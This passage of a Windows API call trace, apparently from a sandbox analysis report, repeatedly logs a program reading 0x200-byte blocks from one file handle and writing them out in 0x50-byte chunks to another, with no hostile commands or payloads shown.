(_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.712] GetFileType (hFile=0x4c) returned 0x1 [0092.712] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.713] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.713] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.713] GetFileType (hFile=0x4c) returned 0x1 [0092.713] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.714] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.714] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.714] GetFileType (hFile=0x4c) returned 0x1 [0092.714] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.715] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.715] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.715] GetFileType (hFile=0x4c) returned 0x1 [0092.715] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.716] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.716] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.716] GetFileType (hFile=0x4c) returned 0x1 [0092.716] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.717] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.717] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.717] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.717] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.718] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.718] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] GetFileType (hFile=0x4c) returned 0x1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.718] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.718] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.719] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.719] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] GetFileType (hFile=0x4c) returned 0x1 [0092.719] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.719] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] GetFileType (hFile=0x4c) returned 0x1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] GetFileType (hFile=0x4c) returned 0x1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.720] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.720] GetFileType (hFile=0x4c) returned 